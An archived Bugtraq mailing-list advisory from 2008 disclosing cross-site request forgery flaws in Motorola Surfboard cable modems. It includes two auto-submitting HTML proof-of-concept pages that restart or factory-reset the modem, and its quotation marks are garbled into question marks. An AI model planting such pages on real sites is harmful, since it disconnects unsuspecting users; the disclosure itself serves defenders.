Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Sea-Surfing on the Motorola Surfboard

from [th3 . r00k . nospam] Network Security [Permanent Link]
Subject: Sea-Surfing on the Motorola Surfboard
Date: 18 Apr 2008 07:13:43 -0000 
More information about this flaw can be found here:
http://www.rooksecurity.com/blog/?p=4

Motorola Surfboard Cable Modems suffer from two Denial of Service attacks by 
means of Cross Site Request Forgery.

The latest version of The Motorola Surfboard is affected at the time of the 
writing.

Restarts the modem:
<html>
<form id=1 method=post action=?http://192.168.100.1/configdata.html?>
<input name=?BUTTON_INPUT? value=?Restart+Cable+Modem?>
</form>
<html>
<script>
document.getElementById(1).submit();
</script>

This CSRF will disconnect the user from the internet for longer.
?The process to get back online from a factory default condition could take 
from 5 to 30 minutes.?
<html>
<form id=2 method=post action=?http://192.168.100.1/configdata.html?>
<input name=?BUTTON_INPUT? value=?Reset+All+Defaults?>
</form>
<html>
<script>
document.getElementById(2).submit();
</script>


Peace
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Sea-Surfing on the Motorola Surfboard, th3 . r00k . nospam <=
Previous by Date:  Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it, crazy_kinq
Next by Date:  Re: Powered by gCards v1.46 SQL, packet
Previous by Thread:  Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it, crazy_kinq
Next by Thread:  [Full-disclosure] [USN-604-1] Gnumeric vulnerability, Kees Cook
Indexes:  [Date] [Thread] [Top] [All Lists]